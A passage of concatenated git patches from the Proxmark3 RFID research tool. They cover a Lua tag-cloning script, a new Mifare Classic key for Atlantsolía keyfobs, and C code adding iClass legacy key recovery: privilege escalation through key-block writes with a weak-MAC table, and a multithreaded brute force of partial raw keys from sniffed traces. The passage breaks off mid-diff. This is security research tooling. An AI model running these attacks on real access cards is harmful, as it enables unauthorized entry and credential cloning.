PM3'..ac.reset..' !') + print( string.rep('--',39) ) + io.write(' Continue with this operation'..ac.yellow..' (Enter/n)'..ac.reset..' ? > ') + answer = io.read() + if answer == 'n' then + core.console('clear') + print( string.rep('--',39) ) + print(ac.red..' USER ABORTED'..ac.reset) + print( string.rep('--',39) ) + break + end + core.console('clear') + print( string.rep('--',39) ) + if emarine then + core.console( ('lf em 410x clone --id %02X%08X'):format(hi, low) ) + else + core.console( ('lf em 410x clone --id %02X%08X'):format(hi, low) ) + core.console('lf t55 write -b 0 -d 00148080') + core.console('lf t55 write -b 3 -d 7E1EAAAA') + core.console('lf t55 write -b 4 -d AAAAAAAA') + end + count = count+1 + end + writefile(hi, low) + core.console('pref set hint --on') + print( string.rep('--',39) ) + if count > 0 then + print((' TAGs created: '..ac.green..'%s'..ac.reset):format(count)) + print( string.rep('--',39) ) + end +end +main(args) From 6404cf82e83eeddb7d4e993cab482ae4e6376303 Mon Sep 17 00:00:00 2001 From: Xavier <90627943+kitsunehunter@users.noreply.github.com> Date: Tue, 16 Jul 2024 00:27:28 -0400 Subject: [PATCH 091/112] Update workbench download Ensures consistency with the rest of the downgrade instructions Signed-off-by: Xavier <90627943+kitsunehunter@users.noreply.github.com> --- doc/hid_downgrade.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/hid_downgrade.md b/doc/hid_downgrade.md index d9bea939b..c5a85f0ab 100644 --- a/doc/hid_downgrade.md +++ b/doc/hid_downgrade.md @@ -182,7 +182,7 @@ drop iclass-flipper.picopass file here and simulate on Flipper ## Using Omnikey Reader 5427CK Gen2 and Proxmark3 ^[Top](#top) -1. Download latest version of Omnikey workbench [here](https://www3.hidglobal.com/drivers/14994) +1. Download latest version of Omnikey workbench [here](https://www.hidglobal.com/drivers/37339) 2. Plug in Omnikey reader 3. Start Omnikey workbench 4. Switch reader mode to CCID mode From 244dec352340efa229c99f84c26e62a4b78e791f Mon Sep 17 00:00:00 2001 From: dandri Date: Wed, 17 Jul 2024 15:02:39 +0000 Subject: [PATCH 092/112] Update mfc_default_keys.dic MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Add key for Atlantsolía keyfobs --- client/dictionaries/mfc_default_keys.dic | 2 ++ 1 file changed, 2 insertions(+) diff --git a/client/dictionaries/mfc_default_keys.dic b/client/dictionaries/mfc_default_keys.dic index 44822432e..5899d97e0 100644 --- a/client/dictionaries/mfc_default_keys.dic +++ b/client/dictionaries/mfc_default_keys.dic @@ -2525,3 +2525,5 @@ bd6af9754c18 28220F14BEF0 # key for Orkan keyfobs 300724070486 +# key for Atlandsolía keyfobs +60FCB3C42ABF From dbd4e98d157d5d5fdf577fd25367a542932e6c4d Mon Sep 17 00:00:00 2001 From: dandri Date: Thu, 18 Jul 2024 22:09:14 +0000 Subject: [PATCH 093/112] Update mfc_default_keys.dic Correct source of cards and spelling --- client/dictionaries/mfc_default_keys.dic | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/client/dictionaries/mfc_default_keys.dic b/client/dictionaries/mfc_default_keys.dic index 5899d97e0..a532fe046 100644 --- a/client/dictionaries/mfc_default_keys.dic +++ b/client/dictionaries/mfc_default_keys.dic @@ -2521,9 +2521,9 @@ bd6af9754c18 17fe45604a0d 17fe45604a0e 17fe45604a0f -# keys for Laugardalslaug in Iceland +# keys for swimming pool cards in Reykjavík Iceland 28220F14BEF0 # key for Orkan keyfobs 300724070486 -# key for Atlandsolía keyfobs +# key for Atlantsolía keyfobs 60FCB3C42ABF From 07c7ba6b0463c264acd830260ea666e7804518d3 Mon Sep 17 00:00:00 2001 From: dandri Date: Thu, 18 Jul 2024 22:13:44 +0000 Subject: [PATCH 094/112] Update CHANGELOG.md --- CHANGELOG.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 19f23eea2..90358144a 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -12,9 +12,9 @@ This project uses the changelog in accordance with [keepchangelog](http://keepac - Added new t55xx password (002BCFCF) sniffed from cheap cloner (@davidbeauchamp) - Fixed 'hf 14b sim' - now works (@michi-jung) - Added VB6 Rng for iclass elite keys `hf iclass lookup` and `hf iclass chk` functions by porting @bettse work in the Flipper Zero Picopass App (@antiklesys) -- Added MFC Keys for Laugardalslaug in Iceland (@dandri) -- Added key for Orkan keyfobs(@dandri) - +- Added MFC Key for swimming pool cards in Reykjavík Iceland (@dandri) +- Added key for Orkan keyfobs (@dandri) +- Added key for Atlantsolía keyfobs (@dandri) ## [Aurora.4.18589][2024-05-28] - Fixed the pm3 regressiontests for Hitag2Crack (@iceman1001) - Changed `mem spiffs tree` - adapted to bigbuff and show if empty (@iceman1001) From 1832997ccb1654507a76afcf159e2c895937af61 Mon Sep 17 00:00:00 2001 From: Antiklesys Date: Fri, 19 Jul 2024 14:47:13 +0800 Subject: [PATCH 095/112] Iclass Legacy Raw Key Recovery Function Based on the work described in Dismantling iClass whitepaper. hf iclass legbrute is tested working hf iclass legrec is partially working: logic of operations and sequence seems to be in order and was tested on simulated data to be effective. The privilege escalation part is still not successful, but the logic should be correct. --- CHANGELOG.md | 2 + armsrc/appmain.c | 4 + armsrc/iclass.c | 213 +++++++++++++++++++++++++++ armsrc/iclass.h | 6 + client/src/cmdhficlass.c | 300 +++++++++++++++++++++++++++++++++++++++ client/src/cmdhficlass.h | 3 + include/pm3_cmd.h | 1 + 7 files changed, 529 insertions(+) diff --git a/CHANGELOG.md b/CHANGELOG.md index 90358144a..8bc1502ec 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -15,6 +15,8 @@ This project uses the changelog in accordance with [keepchangelog](http://keepac - Added MFC Key for swimming pool cards in Reykjavík Iceland (@dandri) - Added key for Orkan keyfobs (@dandri) - Added key for Atlantsolía keyfobs (@dandri) +- Added `hf iclass legbrute` this function allows to bruteforce 40/64 k1 bits of an iclass card to recover the raw key used(@antiklesys). +- Added `hf iclass legrec` this function allows to recover 24/64 k1 bits of an iclass card (@antiklesys). ## [Aurora.4.18589][2024-05-28] - Fixed the pm3 regressiontests for Hitag2Crack (@iceman1001) - Changed `mem spiffs tree` - adapted to bigbuff and show if empty (@iceman1001) diff --git a/armsrc/appmain.c b/armsrc/appmain.c index 41a21bbb0..d4faff5a1 100644 --- a/armsrc/appmain.c +++ b/armsrc/appmain.c @@ -2061,6 +2061,10 @@ static void PacketReceived(PacketCommandNG *packet) { iClass_Restore((iclass_restore_req_t *)packet->data.asBytes); break; } + case CMD_HF_ICLASS_RECOVER: { + iClass_Recover((iclass_recover_req_t *)packet->data.asBytes); + break; + } case CMD_HF_ICLASS_CREDIT_EPURSE: { iclass_credit_epurse((iclass_credit_epurse_t *)packet->data.asBytes); break; diff --git a/armsrc/iclass.c b/armsrc/iclass.c index ca63c5c93..69ad6f951 100644 --- a/armsrc/iclass.c +++ b/armsrc/iclass.c @@ -2152,3 +2152,216 @@ out: reply_ng(CMD_HF_ICLASS_RESTORE, isOK, NULL, 0); } } + +void generate_single_key_block_inverted(const uint8_t startingKey[PICOPASS_BLOCK_SIZE], uint32_t index, uint8_t keyBlock[PICOPASS_BLOCK_SIZE]) { + uint32_t carry = index; + memcpy(keyBlock, startingKey, PICOPASS_BLOCK_SIZE); + + for (int j = PICOPASS_BLOCK_SIZE - 1; j >= 0; j--) { + uint8_t increment_value = carry & 0x07; // Use only the last 3 bits of carry + keyBlock[j] = increment_value; // Set the last 3 bits, assuming first 5 bits are always 0 + + carry >>= 3; // Shift right by 3 bits for the next byte + if (carry == 0) { + // If no more carry, break early to avoid unnecessary loops + break; + } + } +} +// Function to convert an unsigned int to binary string +void intToBinary(unsigned int num, char *binaryStr, int size) { + binaryStr[size] = '\0'; // Null-terminate the string + for (int i = size - 1; i >= 0; i--) { + binaryStr[i] = (num % 2) ? '1' : '0'; + num /= 2; + } +} + +// Function to convert a binary string to hexadecimal +uint8_t binaryToHex(char *binaryStr) { + return (uint8_t)strtoul(binaryStr, NULL, 2); +} + +// Function to convert an unsigned int to an array of hex values +void convertToHexArray(unsigned int num, uint8_t *partialKey) { + char binaryStr[25]; // 24 bits for binary representation + 1 for null terminator + + // Convert the number to binary string + intToBinary(num, binaryStr, 24); + + // Split the binary string into groups of 3 and convert to hex + for (int i = 0; i < PICOPASS_BLOCK_SIZE; i++) { + char group[4]; + strncpy(group, binaryStr + i * 3, 3); + group[3] = '\0'; // Null-terminate the group string + partialKey[i] = binaryToHex(group); + } +} + +void iClass_Recover(iclass_recover_req_t *msg) { + + bool shallow_mod = false; + + LED_A_ON(); + + Iso15693InitReader(); + //Authenticate with AA2 with the standard key to get the AA2 mac + //Step0 Card Select Routine + + uint32_t eof_time = 0; + picopass_hdr_t hdr = {0}; + bool res = select_iclass_tag(&hdr, true, &eof_time, shallow_mod); + if (res == false) { + goto out; + } + + //Step1 Authenticate with AA2 using K2 + + uint8_t mac2[4] = {0}; + uint32_t start_time = eof_time + DELAY_ICLASS_VICC_TO_VCD_READER; + res = authenticate_iclass_tag(&msg->req2, &hdr, &start_time, &eof_time, mac2); + if (res == false) { + goto out; + } + + uint8_t div_key2[8] = {0}; + memcpy(div_key2, hdr.key_c, 8); + + //cycle reader to reset cypher state and be able to authenticate with k1 trace + switch_off(); + Iso15693InitReader(); + + //Step0 Card Select Routine + + eof_time = 0; + //hdr = {0}; + res = select_iclass_tag(&hdr, false, &eof_time, shallow_mod); + if (res == false) { + goto out; + } + + //Step1 Authenticate with AA1 using trace + + uint8_t mac1[4] = {0}; + start_time = eof_time + DELAY_ICLASS_VICC_TO_VCD_READER; + res = authenticate_iclass_tag(&msg->req, &hdr, &start_time, &eof_time, mac1); + if (res == false) { + goto out; + } + + //Step2 Privilege Escalation: attempt to read AA2 with credentials for AA1 + uint8_t blockno = 24; + uint8_t cmd_read[] = {ICLASS_CMD_READ_OR_IDENTIFY, blockno, 0x00, 0x00}; + AddCrc(cmd_read + 1, 1); + uint8_t resp[10]; + + res = iclass_send_cmd_with_retries(cmd_read, sizeof(cmd_read), resp, sizeof(resp), 10, 3, &start_time, ICLASS_READER_TIMEOUT_OTHERS, &eof_time, shallow_mod); + + static uint8_t iClass_Mac_Table[8][8] = { //Reference weak macs table + { 0x00, 0x00, 0x00, 0x00, 0xBF, 0x5D, 0x67, 0x7F }, //Expected mac when last 3 bits of each byte are: 000 + { 0x00, 0x00, 0x00, 0x00, 0x10, 0xED, 0x6F, 0x11 }, //Expected mac when last 3 bits of each byte are: 001 + { 0x00, 0x00, 0x00, 0x00, 0x53, 0x35, 0x42, 0x0F }, //Expected mac when last 3 bits of each byte are: 010 + { 0x00, 0x00, 0x00, 0x00, 0xAB, 0x47, 0x4D, 0xA0 }, //Expected mac when last 3 bits of each byte are: 011 + { 0x00, 0x00, 0x00, 0x00, 0xF6, 0xCF, 0x43, 0x36 }, //Expected mac when last 3 bits of each byte are: 100 + { 0x00, 0x00, 0x00, 0x00, 0x59, 0x7F, 0x4B, 0x58 }, //Expected mac when last 3 bits of each byte are: 101 + { 0x00, 0x00, 0x00, 0x00, 0x1A, 0xA7, 0x66, 0x46 }, //Expected mac when last 3 bits of each byte are: 110 + { 0x00, 0x00, 0x00, 0x00, 0xE2, 0xD5, 0x69, 0xE9 } //Expected mac when last 3 bits of each byte are: 111 + }; + //Viewing the weak macs table card 24 bits (3x8) in the form of a 24 bit decimal number + static uint32_t iClass_Mac_Table_Bit_Values[8] = {0, 2396745, 4793490, 7190235, 9586980, 11983725, 14380470, 16777215}; + + uint8_t zero_key[PICOPASS_BLOCK_SIZE] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}; + uint32_t index = 1; + int bits_found = -1; + + //START LOOP + while (bits_found == -1){ + + //Step3 Calculate New Key + uint8_t GenKeyBlock[PICOPASS_BLOCK_SIZE]; + uint8_t GenKeyBlock_old[PICOPASS_BLOCK_SIZE]; + uint8_t XorKeyBlock[PICOPASS_BLOCK_SIZE]; + generate_single_key_block_inverted(zero_key, index, GenKeyBlock); + + //NOTE BEFORE UPDATING THE KEY WE NEED TO KEEP IN MIND KEYS ARE XORRED + //xor the new key against the previously generated key so that we only update the difference + if(index != 0){ + generate_single_key_block_inverted(zero_key, index - 1, GenKeyBlock_old); + for (int i = 0; i < 8 ; i++) { + XorKeyBlock[i] = GenKeyBlock[i] ^ GenKeyBlock_old[i]; + } + }else{ + memcpy(XorKeyBlock, GenKeyBlock, PICOPASS_BLOCK_SIZE); + } + + //Step4 Calculate New Mac + + bool use_mac = true; + uint8_t wb[9] = {0}; + blockno = 3; + wb[0] = blockno; + memcpy(wb + 1, XorKeyBlock, 8); + + doMAC_N(wb, sizeof(wb), div_key2, mac2); + + //Step5 Perform Write + + if (iclass_writeblock_ext(blockno, XorKeyBlock, mac2, use_mac, shallow_mod)) { + Dbprintf("Write block [%3d/0x%02X] " _GREEN_("successful"), blockno, blockno); + } else { + Dbprintf("Write block [%3d/0x%02X] " _RED_("failed"), blockno, blockno); + goto out; + } + //Step6 Perform 8 authentication attempts + + for (int i = 0; i < 8 ; ++i) { + //need to craft the authentication payload accordingly + memcpy(msg->req.key, iClass_Mac_Table[i], 8); + res = authenticate_iclass_tag(&msg->req, &hdr, &start_time, &eof_time, mac1); //the mac here needs to be changed, mac 2 is a compiling placeholder + if (res == true) { + bits_found = iClass_Mac_Table_Bit_Values[i] ^ index; + Dbprintf("Found Card Bits Index: " _GREEN_("[%3d]"), index); + Dbprintf("Mac Table Bit Values: " _GREEN_("[%3d]"), iClass_Mac_Table_Bit_Values[i]); + Dbprintf("Decimal Value of Partial Key: " _GREEN_("[%3d]"), bits_found); + goto restore; + } + } + + }//end while + + +restore: + ;//empty statement for compilation + uint8_t partialKey[PICOPASS_BLOCK_SIZE]; + convertToHexArray(bits_found, partialKey); + + for (int i = 0; i < 8; i++){ + Dbprintf("Raw Key Partial Bytes: " _GREEN_("[%3d -> 0x%02X]"), i, partialKey); + } + + uint8_t resetKey[PICOPASS_BLOCK_SIZE]; + convertToHexArray(index, resetKey); + + //Calculate reset Mac + + bool use_mac = true; + uint8_t wb[9] = {0}; + blockno = 3; + wb[0] = blockno; + memcpy(wb + 1, resetKey, 8); + + doMAC_N(wb, sizeof(wb), div_key2, mac2); + if (iclass_writeblock_ext(blockno, resetKey, mac2, use_mac, shallow_mod)) { + Dbprintf("Restore of Original Key [%3d/0x%02X] " _GREEN_("successful"), blockno, blockno); + } else { + Dbprintf("Restore of Original Key [%3d/0x%02X] " _RED_("failed"), blockno, blockno); + } + switch_off(); + + +out: + + switch_off(); + + +} \ No newline at end of file diff --git a/armsrc/iclass.h b/armsrc/iclass.h index 4a71780bb..56030acc0 100644 --- a/armsrc/iclass.h +++ b/armsrc/iclass.h @@ -70,4 +70,10 @@ bool authenticate_iclass_tag(iclass_auth_req_t *payload, picopass_hdr_t *hdr, ui uint8_t get_pagemap(const picopass_hdr_t *hdr); void iclass_send_as_reader(uint8_t *frame, int len, uint32_t *start_time, uint32_t *end_time, bool shallow_mod); + +void generate_single_key_block_inverted(const uint8_t startingKey[PICOPASS_BLOCK_SIZE], uint32_t index, uint8_t keyBlock[PICOPASS_BLOCK_SIZE]); +void intToBinary(unsigned int num, char *binaryStr, int size); +uint8_t binaryToHex(char *binaryStr); +void convertToHexArray(unsigned int num, uint8_t *partialKey); +void iClass_Recover(iclass_recover_req_t *msg); #endif diff --git a/client/src/cmdhficlass.c b/client/src/cmdhficlass.c index eaa83aeaf..ad6ea39f0 100644 --- a/client/src/cmdhficlass.c +++ b/client/src/cmdhficlass.c @@ -3842,6 +3842,304 @@ void picopass_elite_nextKey(uint8_t* key) { memcpy(key, key_state, 8); } +static int CmdHFiClassRecover(uint8_t key[8]) { + + uint32_t payload_size = sizeof(iclass_recover_req_t); + uint8_t aa2_standard_key[PICOPASS_BLOCK_SIZE] = {0xFD, 0xCB, 0x5A, 0x52, 0xEA, 0x8F, 0x30, 0x90}; + iclass_recover_req_t *payload = calloc(1, payload_size); + payload->req.use_raw = true; + payload->req.use_elite = false; + payload->req.use_credit_key = false; + payload->req.use_replay = true; + payload->req.send_reply = true; + payload->req.do_auth = true; + payload->req.shallow_mod = false; + payload->req2.use_raw = false; + payload->req2.use_elite = false; + payload->req2.use_credit_key = true; + payload->req2.use_replay = false; + payload->req2.send_reply = true; + payload->req2.do_auth = true; + payload->req2.shallow_mod = false; + memcpy(payload->req.key, key, 8); + memcpy(payload->req2.key, aa2_standard_key, 8); + + PrintAndLogEx(INFO, "Recover started..."); + + PacketResponseNG resp; + clearCommandBuffer(); + SendCommandNG(CMD_HF_ICLASS_RECOVER, (uint8_t *)payload, payload_size); + + if (WaitForResponseTimeout(CMD_HF_ICLASS_RECOVER, &resp, 2500) == 0) { + PrintAndLogEx(WARNING, "command execute timeout"); + DropField(); + free(payload); + return PM3_ETIMEOUT; + } + + if (resp.status == PM3_SUCCESS) { + PrintAndLogEx(SUCCESS, "iCLASS Recover " _GREEN_("successful")); + } else { + PrintAndLogEx(WARNING, "iCLASS Recover " _RED_("failed")); + } + + free(payload); + return resp.status; +} + +typedef struct { + uint32_t start_index; + uint32_t keycount; + const uint8_t *startingKey; + uint8_t (*keyBlock)[PICOPASS_BLOCK_SIZE]; +} ThreadData; + +void *generate_key_blocks(void *arg) { + ThreadData *data = (ThreadData *)arg; + uint32_t start_index = data->start_index; + uint32_t keycount = data->keycount; + const uint8_t *startingKey = data->startingKey; + uint8_t (*keyBlock)[PICOPASS_BLOCK_SIZE] = data->keyBlock; + + for (uint32_t i = 0; i < keycount; i++) { + uint32_t carry = start_index + i; + memcpy(keyBlock[i], startingKey, PICOPASS_BLOCK_SIZE); + + for (int j = PICOPASS_BLOCK_SIZE - 1; j >= 0; j--) { + uint8_t increment_value = (carry & 0x1F) << 3; // Use only the first 5 bits of carry + keyBlock[i][j] = (keyBlock[i][j] & 0x07) | increment_value; // Preserve the last three bits + + carry >>= 5; // Shift right by 5 bits for the next byte + if (carry == 0) { + // If no more carry, break early to avoid unnecessary loops + break; + } + } + } + + return NULL; +} + +void generate_single_key_block_inverted(const uint8_t startingKey[PICOPASS_BLOCK_SIZE], uint32_t index, uint8_t keyBlock[PICOPASS_BLOCK_SIZE]) { + uint32_t carry = index; + memcpy(keyBlock, startingKey, PICOPASS_BLOCK_SIZE); + + for (int j = PICOPASS_BLOCK_SIZE - 1; j >= 0; j--) { + uint8_t increment_value = carry & 0x07; // Use only the last 3 bits of carry + keyBlock[j] = increment_value; // Set the last 3 bits, assuming first 5 bits are always 0 + + carry >>= 3; // Shift right by 3 bits for the next byte + if (carry == 0) { + // If no more carry, break early to avoid unnecessary loops + break; + } + } +} + +static int CmdHFiClassLegRecLookUp(const char *Cmd) { + + //Standalone Command Start + CLIParserContext *ctx; + CLIParserInit(&ctx, "hf iclass legbrute", + "This command take sniffed trace data and partial raw key and bruteforces the remaining 40 bits of the raw key.", + "hf iclass legbrute --csn 8D7BD711FEFF12E0 --epurse feffffffffffffff --macs 00000000BD478F76 --pk B4F12AADC5301225" + ); + + void *argtable[] = { + arg_param_begin, + arg_str1(NULL, "csn", "", "Specify CSN as 8 hex bytes"), + arg_str1(NULL, "epurse", "", "Specify ePurse as 8 hex bytes"), + arg_str1(NULL, "macs", "", "MACs"), + arg_str1(NULL, "pk", "", "Partial Key"), + arg_param_end + }; + CLIExecWithReturn(ctx, Cmd, argtable, false); + + int csn_len = 0; + uint8_t csn[8] = {0}; + CLIGetHexWithReturn(ctx, 1, csn, &csn_len); + + if (csn_len > 0) { + if (csn_len != 8) { + PrintAndLogEx(ERR, "CSN is incorrect length"); + CLIParserFree(ctx); + return PM3_EINVARG; + } + } + + int epurse_len = 0; + uint8_t epurse[8] = {0}; + CLIGetHexWithReturn(ctx, 2, epurse, &epurse_len); + + if (epurse_len > 0) { + if (epurse_len != 8) { + PrintAndLogEx(ERR, "ePurse is incorrect length"); + CLIParserFree(ctx); + return PM3_EINVARG; + } + } + + int macs_len = 0; + uint8_t macs[8] = {0}; + CLIGetHexWithReturn(ctx, 3, macs, &macs_len); + + if (macs_len > 0) { + if (macs_len != 8) { + PrintAndLogEx(ERR, "MAC is incorrect length"); + CLIParserFree(ctx); + return PM3_EINVARG; + } + } + + int startingkey_len = 0; + uint8_t startingKey[8] = {0}; + CLIGetHexWithReturn(ctx, 4, startingKey, &startingkey_len); + + if (startingkey_len > 0) { + if (startingkey_len != 8) { + PrintAndLogEx(ERR, "Partial Key is incorrect length"); + CLIParserFree(ctx); + return PM3_EINVARG; + } + } + + CLIParserFree(ctx); + //Standalone Command End + + uint8_t CCNR[12]; + uint8_t MAC_TAG[4] = {0, 0, 0, 0}; + + // Copy CCNR and MAC_TAG + memcpy(CCNR, epurse, 8); + memcpy(CCNR + 8, macs, 4); + memcpy(MAC_TAG, macs + 4, 4); + + PrintAndLogEx(SUCCESS, " CSN: " _GREEN_("%s"), sprint_hex(csn, 8)); + PrintAndLogEx(SUCCESS, " Epurse: %s", sprint_hex(epurse, 8)); + PrintAndLogEx(SUCCESS, " MACS: %s", sprint_hex(macs, 8)); + PrintAndLogEx(SUCCESS, " CCNR: " _GREEN_("%s"), sprint_hex(CCNR, sizeof(CCNR))); + PrintAndLogEx(SUCCESS, "TAG MAC: %s", sprint_hex(MAC_TAG, sizeof(MAC_TAG))); + PrintAndLogEx(SUCCESS, "Starting Key: %s", sprint_hex(startingKey, 8)); + + uint32_t keycount = 1000000; + uint32_t keys_per_thread = 200000; + uint32_t num_threads = keycount / keys_per_thread; + pthread_t threads[num_threads]; + ThreadData thread_data[num_threads]; + iclass_prekey_t *prekey = NULL; + iclass_prekey_t lookup; + iclass_prekey_t *item = NULL; + + memcpy(lookup.mac, MAC_TAG, 4); + + uint32_t block_index = 0; + + while (item == NULL) { + for (uint32_t t = 0; t < num_threads; t++) { + thread_data[t].start_index = block_index * keycount + t * keys_per_thread; + thread_data[t].keycount = keys_per_thread; + thread_data[t].startingKey = startingKey; + thread_data[t].keyBlock = calloc(keys_per_thread, PICOPASS_BLOCK_SIZE); + + if (thread_data[t].keyBlock == NULL) { + PrintAndLogEx(ERROR, "Memory allocation failed for keyBlock in thread %d.", t); + for (uint32_t i = 0; i < t; i++) { + free(thread_data[i].keyBlock); + } + return PM3_EINVARG; + } + + pthread_create(&threads[t], NULL, generate_key_blocks, (void *)&thread_data[t]); + } + + for (uint32_t t = 0; t < num_threads; t++) { + pthread_join(threads[t], NULL); + } + + if (prekey == NULL) { + prekey = calloc(keycount, sizeof(iclass_prekey_t)); + } else { + prekey = realloc(prekey, (block_index + 1) * keycount * sizeof(iclass_prekey_t)); + } + + if (prekey == NULL) { + PrintAndLogEx(ERROR, "Memory allocation failed for prekey."); + for (uint32_t t = 0; t < num_threads; t++) { + free(thread_data[t].keyBlock); + } + return PM3_EINVARG; + } + + PrintAndLogEx(INFO, "Generating diversified keys..."); + for (uint32_t t = 0; t < num_threads; t++) { + GenerateMacKeyFrom(csn, CCNR, true, false, (uint8_t *)thread_data[t].keyBlock, keys_per_thread, prekey + (block_index * keycount) + (t * keys_per_thread)); + } + + PrintAndLogEx(INFO, "Sorting..."); + + // Sort mac list + qsort(prekey, (block_index + 1) * keycount, sizeof(iclass_prekey_t), cmp_uint32); + + PrintAndLogEx(SUCCESS, "Searching for " _YELLOW_("%s") " key...", "DEBIT"); + + // Binary search + item = (iclass_prekey_t *)bsearch(&lookup, prekey, (block_index + 1) * keycount, sizeof(iclass_prekey_t), cmp_uint32); + + for (uint32_t t = 0; t < num_threads; t++) { + free(thread_data[t].keyBlock); + } + + block_index++; + } + + if (item != NULL) { + PrintAndLogEx(SUCCESS, "Found valid RAW key " _GREEN_("%s"), sprint_hex(item->key, 8)); + } + + free(prekey); + PrintAndLogEx(NORMAL, ""); + return PM3_SUCCESS; +} + + +static int CmdHFiClassLegacyRecover(const char *Cmd) { + + CLIParserContext *ctx; + CLIParserInit(&ctx, "hf iclass legrec", + "Attempts to recover the diversified key of a specific iClass card. This may take a long time. The Card must remain be on the PM3 antenna during the whole process! This process may brick the card!", + "hf iclass legrec --macs 0000000089cb984b" + ); + + void *argtable[] = { + arg_param_begin, + arg_str1(NULL, "macs", "", "MACs"), + arg_param_end + }; + CLIExecWithReturn(ctx, Cmd, argtable, false); + + int macs_len = 0; + uint8_t macs[8] = {0}; + CLIGetHexWithReturn(ctx, 1, macs, &macs_len); + + if (macs_len > 0) { + if (macs_len != 8) { + PrintAndLogEx(ERR, "MAC is incorrect length"); + CLIParserFree(ctx); + return PM3_EINVARG; + } + } + + CLIParserFree(ctx); + + CmdHFiClassRecover(macs); + + PrintAndLogEx(WARNING, _YELLOW_("If the process completed, you can now run 'hf iclass legrecbrute' with the partial key found.")); + + PrintAndLogEx(NORMAL, ""); + return PM3_SUCCESS; + +} + static int CmdHFiClassLookUp(const char *Cmd) { CLIParserContext *ctx; CLIParserInit(&ctx, "hf iclass lookup", @@ -4738,6 +5036,8 @@ static command_t CommandTable[] = { {"chk", CmdHFiClassCheckKeys, IfPm3Iclass, "Check keys"}, {"loclass", CmdHFiClass_loclass, AlwaysAvailable, "Use loclass to perform bruteforce reader attack"}, {"lookup", CmdHFiClassLookUp, AlwaysAvailable, "Uses authentication trace to check for key in dictionary file"}, + {"legrec", CmdHFiClassLegacyRecover, IfPm3Iclass, "Attempts to recover the standard key of a legacy card"}, + {"legbrute", CmdHFiClassLegRecLookUp, AlwaysAvailable, "Bruteforces 40 bits of a partial raw key"}, {"-----------", CmdHelp, IfPm3Iclass, "-------------------- " _CYAN_("Simulation") " -------------------"}, {"sim", CmdHFiClassSim, IfPm3Iclass, "Simulate iCLASS tag"}, {"eload", CmdHFiClassELoad, IfPm3Iclass, "Upload file into emulator memory"}, diff --git a/client/src/cmdhficlass.h b/client/src/cmdhficlass.h index b3b0844ab..8bbab9216 100644 --- a/client/src/cmdhficlass.h +++ b/client/src/cmdhficlass.h @@ -42,4 +42,7 @@ void picopass_elite_reset(void); uint32_t picopass_elite_rng(void); uint32_t picopass_elite_lcg(void); uint8_t picopass_elite_nextByte(void); + +void *generate_key_blocks(void *arg); +void generate_single_key_block_inverted(const uint8_t startingKey[PICOPASS_BLOCK_SIZE], uint32_t index, uint8_t keyBlock[PICOPASS_BLOCK_SIZE]); #endif diff --git a/include/pm3_cmd.h b/include/pm3_cmd.h index 10fe7a81a..6536f4b66 100644 --- a/include/pm3_cmd.h +++ b/include/pm3_cmd.h @@ -630,6 +630,7 @@ typedef struct { #define CMD_HF_ICLASS_CHKKEYS 0x039A #define CMD_HF_ICLASS_RESTORE 0x039B #define CMD_HF_ICLASS_CREDIT_EPURSE 0x039C +#define CMD_HF_ICLASS_RECOVER 0x039D // For ISO1092 / FeliCa From c7541790f8d0235bbc2c2705b34a0f3f700f51ba Mon Sep 17 00:00:00 2001 From: Antiklesys Date: Fri, 19 Jul 2024 14:54:52 +0800 Subject: [PATCH 096/112] Update iclass_cmd.h --- include/iclass_cmd.h | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/include/iclass_cmd.h b/include/iclass_cmd.h index e7e1d0cd3..bb7b6193a 100644 --- a/include/iclass_cmd.h +++ b/include/iclass_cmd.h @@ -105,6 +105,11 @@ typedef struct { iclass_restore_item_t blocks[]; } PACKED iclass_restore_req_t; +typedef struct { + iclass_auth_req_t req; + iclass_auth_req_t req2; +} PACKED iclass_recover_req_t; + typedef struct iclass_premac { uint8_t mac[4]; } PACKED iclass_premac_t; From a127a38cb69b3e7f5e722c8155edc58e4f6bc12d Mon Sep 17 00:00:00 2001 From: Antiklesys Date: Fri, 19 Jul 2024 18:27:36 +0800 Subject: [PATCH 097/112] Updated some as per iceman's comments Made multiple changes as per iceman's comments. Removed redundant/unused function i forgot into cmdhficlass.c Moved conversion functions in util.c for now but haven't yet check if it's possible to reuse the current fuctions already there. Will do that in a moment. --- armsrc/iclass.c | 55 ++++++++++------------------------------ armsrc/iclass.h | 5 +--- armsrc/util.c | 30 ++++++++++++++++++++++ armsrc/util.h | 4 +++ client/src/cmdhficlass.c | 19 ++------------ client/src/cmdhficlass.h | 2 -- 6 files changed, 50 insertions(+), 65 deletions(-) diff --git a/armsrc/iclass.c b/armsrc/iclass.c index 69ad6f951..cd28350bf 100644 --- a/armsrc/iclass.c +++ b/armsrc/iclass.c @@ -2153,7 +2153,7 @@ out: } } -void generate_single_key_block_inverted(const uint8_t startingKey[PICOPASS_BLOCK_SIZE], uint32_t index, uint8_t keyBlock[PICOPASS_BLOCK_SIZE]) { +void generate_single_key_block_inverted(const uint8_t *startingKey, uint32_t index, uint8_t *keyBlock) { uint32_t carry = index; memcpy(keyBlock, startingKey, PICOPASS_BLOCK_SIZE); @@ -2168,35 +2168,6 @@ void generate_single_key_block_inverted(const uint8_t startingKey[PICOPASS_BLOCK } } } -// Function to convert an unsigned int to binary string -void intToBinary(unsigned int num, char *binaryStr, int size) { - binaryStr[size] = '\0'; // Null-terminate the string - for (int i = size - 1; i >= 0; i--) { - binaryStr[i] = (num % 2) ? '1' : '0'; - num /= 2; - } -} - -// Function to convert a binary string to hexadecimal -uint8_t binaryToHex(char *binaryStr) { - return (uint8_t)strtoul(binaryStr, NULL, 2); -} - -// Function to convert an unsigned int to an array of hex values -void convertToHexArray(unsigned int num, uint8_t *partialKey) { - char binaryStr[25]; // 24 bits for binary representation + 1 for null terminator - - // Convert the number to binary string - intToBinary(num, binaryStr, 24); - - // Split the binary string into groups of 3 and convert to hex - for (int i = 0; i < PICOPASS_BLOCK_SIZE; i++) { - char group[4]; - strncpy(group, binaryStr + i * 3, 3); - group[3] = '\0'; // Null-terminate the group string - partialKey[i] = binaryToHex(group); - } -} void 